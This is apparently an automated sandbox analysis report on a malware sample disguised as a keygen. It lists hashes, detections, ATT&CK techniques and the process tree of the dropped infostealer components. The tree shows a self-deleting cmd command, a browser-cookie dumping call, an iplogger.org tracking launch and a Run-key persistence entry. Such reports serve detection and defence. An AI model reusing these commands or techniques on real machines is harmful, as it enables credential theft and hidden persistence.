Resubmissions
12-11-2024 01:29
241112-bwgrxs1gnf 1008-07-2021 12:18
210708-8z6d5h8z2n 1006-07-2021 17:53
210706-g6we6sa7sa 1019-06-2021 18:17
210619-vr8bj2dzfn 1017-06-2021 21:39
210617-a9cvlnmrbx 1011-06-2021 17:26
210611-wvab1yw2tj 1008-06-2021 06:47
210608-qrbpch3y46 1008-06-2021 06:47
210608-64tndgm1ln 1005-06-2021 18:40
210605-cd6qpr55sx 1004-06-2021 11:56
210604-5c416rs3ns 10Analysis
-
max time kernel
1799s -
max time network
1803s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-11-2024 01:29
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Install2.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
Install2.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
keygen-step-4.exe
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
keygen-step-4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
keygen-step-4d.exe
Resource
win7-20240903-en
General
-
Target
keygen-step-4.exe
-
Size
4.6MB
-
MD5
563107b1df2a00f4ec868acd9e08a205
-
SHA1
9cb9c91d66292f5317aa50d92e38834861e9c9b7
-
SHA256
bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9
-
SHA512
99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1
-
SSDEEP
98304:H6Rles9UGuxV53gdsl7s1+IXKe3Z1bZaO4qFqAooEeGmRxl36Z1/B:H+lZ9UGuni+2R73Z1bZn4uKoEeGmRz6N
Malware Config
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral6/files/0x0007000000023c94-475.dat family_fabookie -
Fabookie family
-
Ffdroider family
-
Detected Nirsoft tools 2 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral6/memory/976-486-0x0000000000400000-0x000000000045B000-memory.dmp Nirsoft behavioral6/memory/5320-508-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation keygen-step-4.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation xiuhuali.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation filee.exe -
Executes dropped EXE 9 IoCs
pid Process 1280 xiuhuali.exe 2920 JoSetp.exe 3856 Install.exe 1916 Install.tmp 4832 filee.exe 1368 jg6_6asg.exe 1744 gaoou.exe 976 jfiag3g_gg.exe 5320 jfiag3g_gg.exe -
Loads dropped DLL 2 IoCs
pid Process 2720 rundll32.exe 1916 Install.tmp -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gaoou.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg6_6asg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 19 iplogger.org 29 iplogger.org 31 iplogger.org 7 iplogger.org 8 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 ip-api.com -
resource yara_rule behavioral6/files/0x0007000000023cfc-484.dat upx behavioral6/memory/976-486-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral6/files/0x0009000000023cfd-500.dat upx behavioral6/memory/5320-508-0x0000000000400000-0x0000000000422000-memory.dmp upx behavioral6/memory/5320-502-0x0000000000400000-0x0000000000422000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\install.dll xiuhuali.exe File created C:\Program Files\libEGL.dll xiuhuali.exe File created C:\Program Files\install.dat xiuhuali.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language keygen-step-4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xiuhuali.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jg6_6asg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gaoou.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jfiag3g_gg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language filee.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jfiag3g_gg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2120 cmd.exe 4968 PING.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4968 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2804 msedge.exe 2804 msedge.exe 2948 msedge.exe 2948 msedge.exe 3904 identity_helper.exe 3904 identity_helper.exe 5320 jfiag3g_gg.exe 5320 jfiag3g_gg.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe 2100 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2920 JoSetp.exe Token: SeManageVolumePrivilege 1368 jg6_6asg.exe Token: SeManageVolumePrivilege 1368 jg6_6asg.exe Token: SeManageVolumePrivilege 1368 jg6_6asg.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1280 xiuhuali.exe 1280 xiuhuali.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4472 wrote to memory of 1280 4472 keygen-step-4.exe 86 PID 4472 wrote to memory of 1280 4472 keygen-step-4.exe 86 PID 4472 wrote to memory of 1280 4472 keygen-step-4.exe 86 PID 1280 wrote to memory of 2720 1280 xiuhuali.exe 88 PID 1280 wrote to memory of 2720 1280 xiuhuali.exe 88 PID 1280 wrote to memory of 2720 1280 xiuhuali.exe 88 PID 4472 wrote to memory of 2920 4472 keygen-step-4.exe 89 PID 4472 wrote to memory of 2920 4472 keygen-step-4.exe 89 PID 4472 wrote to memory of 3856 4472 keygen-step-4.exe 93 PID 4472 wrote to memory of 3856 4472 keygen-step-4.exe 93 PID 4472 wrote to memory of 3856 4472 keygen-step-4.exe 93 PID 3856 wrote to memory of 1916 3856 Install.exe 94 PID 3856 wrote to memory of 1916 3856 Install.exe 94 PID 3856 wrote to memory of 1916 3856 Install.exe 94 PID 4472 wrote to memory of 4832 4472 keygen-step-4.exe 95 PID 4472 wrote to memory of 4832 4472 keygen-step-4.exe 95 PID 4472 wrote to memory of 4832 4472 keygen-step-4.exe 95 PID 4832 wrote to memory of 2120 4832 filee.exe 100 PID 4832 wrote to memory of 2120 4832 filee.exe 100 PID 4832 wrote to memory of 2120 4832 filee.exe 100 PID 2120 wrote to memory of 4968 2120 cmd.exe 102 PID 2120 wrote to memory of 4968 2120 cmd.exe 102 PID 2120 wrote to memory of 4968 2120 cmd.exe 102 PID 4472 wrote to memory of 2948 4472 keygen-step-4.exe 103 PID 4472 wrote to memory of 2948 4472 keygen-step-4.exe 103 PID 2948 wrote to memory of 3280 2948 msedge.exe 104 PID 2948 wrote to memory of 3280 2948 msedge.exe 104 PID 4472 wrote to memory of 1368 4472 keygen-step-4.exe 105 PID 4472 wrote to memory of 1368 4472 keygen-step-4.exe 105 PID 4472 wrote to memory of 1368 4472 keygen-step-4.exe 105 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106 PID 2948 wrote to memory of 5000 2948 msedge.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2720
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Users\Admin\AppData\Local\Temp\is-ADEH6.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-ADEH6.tmp\Install.tmp" /SL5="$A026C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1916
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4968
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rFsB62⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc9e2b46f8,0x7ffc9e2b4708,0x7ffc9e2b47183⤵PID:3280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:23⤵PID:5000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:83⤵PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:13⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:13⤵PID:1280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:83⤵PID:1532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:13⤵PID:2100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:13⤵PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:13⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:13⤵PID:4904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11691512908977492422,11982447055851183490,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:2100
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:976
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5320
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2872
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4616
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
544KB
MD5806c3221a013fec9530762750556c332
SHA136475bcfd0a18555d7c0413d007bbe80f7d321b5
SHA2569bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7
SHA51256bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e
-
Filesize
5KB
MD5fe60ddbeab6e50c4f490ddf56b52057c
SHA16a71fdf73761a1192fd9c6961f66754a63d6db17
SHA2569fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d
SHA5120113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD590941fb53a8e75ce52ee215b8dfc5d42
SHA1c7dc23ff937cb7b2f0c1a79cdc90eefeec9b031d
SHA256f9cfd601d2f727a2f085460a4a5389c07811e3c18c4c8deb3f46999d4093de66
SHA5125f2d060acda40dd21989ca78e49b5e6df201e3301468b4d72733e7b633095dd0eb9c42226fff12dd03b01cf52b325b43e0b4d3ff1a40e749ddbf6a16e93b8ee5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD527b380e1c24d7f925b8ac2f8e3be5d99
SHA1062abc228c7eeda746999d48ca42e85cb58d0e6f
SHA256c722590cd181173f3171df656e75d9cec53d0ca4a4122e944639f6a1d87e2e2f
SHA51284598ab21c9a1c6fbdfe66b68b4faf0f4977cf2fb704552fae097244a6a02d216da2281e2d77cd51c9efdc3dc4a0956a4b1378a6564019231169c26428e157a0
-
Filesize
152B
MD5d22073dea53e79d9b824f27ac5e9813e
SHA16d8a7281241248431a1571e6ddc55798b01fa961
SHA25686713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA51297152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413
-
Filesize
152B
MD5bffcefacce25cd03f3d5c9446ddb903d
SHA18923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA25623e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7
-
Filesize
180B
MD54bc8a3540a546cfe044e0ed1a0a22a95
SHA15387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf
-
Filesize
5KB
MD53c10dd18880a217fc802a5ccbf0ebca6
SHA1af27e7848fcba64df5707104ab8d3613bb020066
SHA2562f89580faaa783e1a769ef50f018c231d35d13ca81ef65fd0b8f04a41b0b4a26
SHA5125e31047cb4a8b7c9fcee52dc560c56f08ac04370aa386a04b684fc0ee03694f093a871c5ab310606cc06c1cef2f00c812172ee5658d2bbac9576299616c7118a
-
Filesize
6KB
MD532f618e6eae9a87ba906dc78780d763a
SHA170c533b6d5f920584ad82b73859e4a85e1790286
SHA256b850981a9b820ad06fc407f0950107c5092348f7f57c5581b9e53773ebaad8b4
SHA51215fad7a4efb2230d5355137f71e896e00bb400cb94c47f586052fffa596d5cff0ac3a6a9b1aae4a445f1aac56b6aea1148fe9fc0c2edb4c3805c5cb40d74107e
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5a6d1fc254ffcc8e31459f2b12bafbfdb
SHA1364a2a20dca9518052682514598d19e55a7818af
SHA25605cd5376a41d5f170164d9616135eb5b62ad70e1c3b32ec8ed01d9a64f8d6f97
SHA5124ad16c7244ec87feddad9c53a264e8b1ca1ec3482ff43f4239f192e9808f6b96af1f496682d6fecee5390909a5994d9b371836f1d267a23a5bb25022f104c477
-
Filesize
4KB
MD5ac617a651bb1cbe99b4c683f2e35a310
SHA1c2ee8d99606a1a597c1e22e3b0f4c583677d5b66
